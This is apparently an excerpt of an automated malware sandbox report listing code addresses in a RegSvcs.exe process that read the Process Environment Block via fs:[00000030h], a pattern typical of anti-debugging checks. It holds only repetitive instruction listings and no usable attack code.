Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01384164 mov eax, dword ptr fs:[00000030h] 7_2_01384164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01348158 mov eax, dword ptr fs:[00000030h] 7_2_01348158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01344144 mov eax, dword ptr fs:[00000030h] 7_2_01344144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01344144 mov ecx, dword ptr fs:[00000030h] 7_2_01344144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01344144 mov eax, dword ptr fs:[00000030h] 7_2_01344144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012AC156 mov eax, dword ptr fs:[00000030h] 7_2_012AC156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012B6154 mov eax, dword ptr fs:[00000030h] 7_2_012B6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F0185 mov eax, dword ptr fs:[00000030h] 7_2_012F0185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0133019F mov eax, dword ptr fs:[00000030h] 7_2_0133019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01354180 mov eax, dword ptr fs:[00000030h] 7_2_01354180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012AA197 mov eax, dword ptr fs:[00000030h] 7_2_012AA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0136C188 mov eax, dword ptr fs:[00000030h] 7_2_0136C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012E01F8 mov eax, dword ptr fs:[00000030h] 7_2_012E01F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_013861E5 mov eax, dword ptr fs:[00000030h] 7_2_013861E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0132E1D0 mov eax, dword ptr fs:[00000030h] 7_2_0132E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0132E1D0 mov ecx, dword ptr fs:[00000030h] 7_2_0132E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0132E1D0 mov eax, dword ptr fs:[00000030h] 7_2_0132E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_013761C3 mov eax, dword ptr fs:[00000030h] 7_2_013761C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01346030 mov eax, dword ptr fs:[00000030h] 7_2_01346030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012AA020 mov eax, dword ptr fs:[00000030h] 7_2_012AA020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012AC020 mov eax, dword ptr fs:[00000030h] 7_2_012AC020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01334000 mov ecx, dword ptr fs:[00000030h] 7_2_01334000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01352000 mov eax, dword ptr fs:[00000030h] 7_2_01352000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012CE016 mov eax, dword ptr fs:[00000030h] 7_2_012CE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012DC073 mov eax, dword ptr fs:[00000030h] 7_2_012DC073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01336050 mov eax, dword ptr fs:[00000030h] 7_2_01336050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012B2050 mov eax, dword ptr fs:[00000030h] 7_2_012B2050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012A80A0 mov eax, dword ptr fs:[00000030h] 7_2_012A80A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_013760B8 mov eax, dword ptr fs:[00000030h] 7_2_013760B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_013760B8 mov ecx, dword ptr fs:[00000030h] 7_2_013760B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_013480A8 mov eax, dword ptr fs:[00000030h] 7_2_013480A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012B208A mov eax, dword ptr fs:[00000030h] 7_2_012B208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012B80E9 mov eax, dword ptr fs:[00000030h] 7_2_012B80E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012AA0E3 mov ecx, dword ptr fs:[00000030h] 7_2_012AA0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_013360E0 mov eax, dword ptr fs:[00000030h] 7_2_013360E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012AC0F0 mov eax, dword ptr fs:[00000030h] 7_2_012AC0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F20F0 mov ecx, dword ptr fs:[00000030h] 7_2_012F20F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_013320DE mov eax, dword ptr fs:[00000030h] 7_2_013320DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01388324 mov eax, dword ptr fs:[00000030h] 7_2_01388324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01388324 mov ecx, dword ptr fs:[00000030h] 7_2_01388324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01388324 mov eax, dword ptr fs:[00000030h] 7_2_01388324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012EA30B mov eax, dword ptr fs:[00000030h] 7_2_012EA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012AC310 mov ecx, dword ptr fs:[00000030h] 7_2_012AC310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012D0310 mov ecx, dword ptr fs:[00000030h] 7_2_012D0310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0135437C mov eax, dword ptr fs:[00000030h] 7_2_0135437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0137A352 mov eax, dword ptr fs:[00000030h] 7_2_0137A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01358350 mov ecx, dword ptr fs:[00000030h] 7_2_01358350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0133035C mov eax, dword ptr fs:[00000030h] 7_2_0133035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0133035C mov ecx, dword ptr fs:[00000030h] 7_2_0133035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0133035C mov eax, dword ptr fs:[00000030h] 7_2_0133035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0138634F mov eax, dword ptr fs:[00000030h]7_2_0138634F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01332349 mov eax, dword ptr fs:[00000030h]7_2_01332349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AE388 mov eax, dword ptr fs:[00000030h]7_2_012AE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AE388 mov eax, dword ptr fs:[00000030h]7_2_012AE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AE388 mov eax, dword ptr fs:[00000030h]7_2_012AE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D438F mov eax, dword ptr fs:[00000030h]7_2_012D438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D438F mov eax, dword ptr fs:[00000030h]7_2_012D438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012A8397 mov eax, dword ptr fs:[00000030h]7_2_012A8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012A8397 mov eax, dword ptr fs:[00000030h]7_2_012A8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012A8397 mov eax, dword ptr fs:[00000030h]7_2_012A8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C03E9 mov eax, dword ptr fs:[00000030h]7_2_012C03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C03E9 mov eax, dword ptr fs:[00000030h]7_2_012C03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C03E9 mov eax, dword ptr fs:[00000030h]7_2_012C03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C03E9 mov eax, dword ptr fs:[00000030h]7_2_012C03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C03E9 mov eax, dword ptr fs:[00000030h]7_2_012C03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C03E9 mov eax, dword ptr fs:[00000030h]7_2_012C03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C03E9 mov eax, dword ptr fs:[00000030h]7_2_012C03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C03E9 mov eax, dword ptr fs:[00000030h]7_2_012C03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E63FF mov eax, dword ptr fs:[00000030h]7_2_012E63FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012CE3F0 mov eax, dword ptr fs:[00000030h]7_2_012CE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012CE3F0 mov eax, dword ptr fs:[00000030h]7_2_012CE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012CE3F0 mov eax, dword ptr fs:[00000030h]7_2_012CE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013543D4 mov eax, dword ptr fs:[00000030h]7_2_013543D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013543D4 mov eax, dword ptr fs:[00000030h]7_2_013543D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA3C0 mov eax, dword ptr fs:[00000030h]7_2_012BA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA3C0 mov eax, dword ptr fs:[00000030h]7_2_012BA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA3C0 mov eax, dword ptr fs:[00000030h]7_2_012BA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA3C0 mov eax, dword ptr fs:[00000030h]7_2_012BA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA3C0 mov eax, dword ptr fs:[00000030h]7_2_012BA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA3C0 mov eax, dword ptr fs:[00000030h]7_2_012BA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B83C0 mov eax, dword ptr fs:[00000030h]7_2_012B83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B83C0 mov eax, dword ptr fs:[00000030h]7_2_012B83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B83C0 mov eax, dword ptr fs:[00000030h]7_2_012B83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B83C0 mov eax, dword ptr fs:[00000030h]7_2_012B83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135E3DB mov eax, dword ptr fs:[00000030h]7_2_0135E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135E3DB mov eax, dword ptr fs:[00000030h]7_2_0135E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135E3DB mov ecx, dword ptr fs:[00000030h]7_2_0135E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135E3DB mov eax, dword ptr fs:[00000030h]7_2_0135E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013363C0 mov eax, dword ptr fs:[00000030h]7_2_013363C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0136C3CD mov eax, dword ptr fs:[00000030h]7_2_0136C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012A823B mov eax, dword ptr fs:[00000030h]7_2_012A823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012A826B mov eax, dword ptr fs:[00000030h]7_2_012A826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01360274 mov eax, dword ptr fs:[00000030h]7_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01360274 mov eax, dword ptr fs:[00000030h]7_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01360274 mov eax, dword ptr fs:[00000030h]7_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01360274 mov eax, dword ptr fs:[00000030h]7_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01360274 mov eax, dword ptr fs:[00000030h]7_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01360274 mov eax, dword ptr fs:[00000030h]7_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01360274 mov eax, dword ptr fs:[00000030h]7_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01360274 mov eax, dword ptr fs:[00000030h]7_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01360274 mov eax, dword ptr fs:[00000030h]7_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01360274 mov eax, dword ptr fs:[00000030h]7_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01360274 mov eax, dword ptr fs:[00000030h]7_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01360274 mov eax, dword ptr fs:[00000030h]7_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B4260 mov eax, dword ptr fs:[00000030h]7_2_012B4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B4260 mov eax, dword ptr fs:[00000030h]7_2_012B4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B4260 mov eax, dword ptr fs:[00000030h]7_2_012B4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0138625D mov eax, dword ptr fs:[00000030h]7_2_0138625D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0136A250 mov eax, dword ptr fs:[00000030h]7_2_0136A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0136A250 mov eax, dword ptr fs:[00000030h]7_2_0136A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01338243 mov eax, dword ptr fs:[00000030h]7_2_01338243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01338243 mov ecx, dword ptr fs:[00000030h]7_2_01338243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B6259 mov eax, dword ptr fs:[00000030h]7_2_012B6259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AA250 mov eax, dword ptr fs:[00000030h]7_2_012AA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013462A0 mov eax, dword ptr fs:[00000030h]7_2_013462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013462A0 mov ecx, dword ptr fs:[00000030h]7_2_013462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013462A0 mov eax, dword ptr fs:[00000030h]7_2_013462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013462A0 mov eax, dword ptr fs:[00000030h]7_2_013462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013462A0 mov eax, dword ptr fs:[00000030h]7_2_013462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013462A0 mov eax, dword ptr fs:[00000030h]7_2_013462A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE284 mov eax, dword ptr fs:[00000030h]7_2_012EE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE284 mov eax, dword ptr fs:[00000030h]7_2_012EE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01330283 mov eax, dword ptr fs:[00000030h]7_2_01330283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01330283 mov eax, dword ptr fs:[00000030h]7_2_01330283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01330283 mov eax, dword ptr fs:[00000030h]7_2_01330283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C02E1 mov eax, dword ptr fs:[00000030h]7_2_012C02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C02E1 mov eax, dword ptr fs:[00000030h]7_2_012C02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C02E1 mov eax, dword ptr fs:[00000030h]7_2_012C02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA2C3 mov eax, dword ptr fs:[00000030h]7_2_012BA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA2C3 mov eax, dword ptr fs:[00000030h]7_2_012BA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA2C3 mov eax, dword ptr fs:[00000030h]7_2_012BA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA2C3 mov eax, dword ptr fs:[00000030h]7_2_012BA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BA2C3 mov eax, dword ptr fs:[00000030h]7_2_012BA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013862D6 mov eax, dword ptr fs:[00000030h]7_2_013862D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE53E mov eax, dword ptr fs:[00000030h]7_2_012DE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE53E mov eax, dword ptr fs:[00000030h]7_2_012DE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE53E mov eax, dword ptr fs:[00000030h]7_2_012DE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE53E mov eax, dword ptr fs:[00000030h]7_2_012DE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DE53E mov eax, dword ptr fs:[00000030h]7_2_012DE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0535 mov eax, dword ptr fs:[00000030h]7_2_012C0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0535 mov eax, dword ptr fs:[00000030h]7_2_012C0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0535 mov eax, dword ptr fs:[00000030h]7_2_012C0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0535 mov eax, dword ptr fs:[00000030h]7_2_012C0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0535 mov eax, dword ptr fs:[00000030h]7_2_012C0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0535 mov eax, dword ptr fs:[00000030h]7_2_012C0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01346500 mov eax, dword ptr fs:[00000030h]7_2_01346500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01384500 mov eax, dword ptr fs:[00000030h]7_2_01384500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01384500 mov eax, dword ptr fs:[00000030h]7_2_01384500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01384500 mov eax, dword ptr fs:[00000030h]7_2_01384500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01384500 mov eax, dword ptr fs:[00000030h]7_2_01384500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01384500 mov eax, dword ptr fs:[00000030h]7_2_01384500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01384500 mov eax, dword ptr fs:[00000030h]7_2_01384500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01384500 mov eax, dword ptr fs:[00000030h]7_2_01384500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E656A mov eax, dword ptr fs:[00000030h]7_2_012E656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E656A mov eax, dword ptr fs:[00000030h]7_2_012E656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E656A mov eax, dword ptr fs:[00000030h]7_2_012E656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B8550 mov eax, dword ptr fs:[00000030h]7_2_012B8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B8550 mov eax, dword ptr fs:[00000030h]7_2_012B8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013305A7 mov eax, dword ptr fs:[00000030h]7_2_013305A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013305A7 mov eax, dword ptr fs:[00000030h]7_2_013305A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013305A7 mov eax, dword ptr fs:[00000030h]7_2_013305A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D45B1 mov eax, dword ptr fs:[00000030h]7_2_012D45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D45B1 mov eax, dword ptr fs:[00000030h]7_2_012D45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E4588 mov eax, dword ptr fs:[00000030h]7_2_012E4588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B2582 mov eax, dword ptr fs:[00000030h]7_2_012B2582
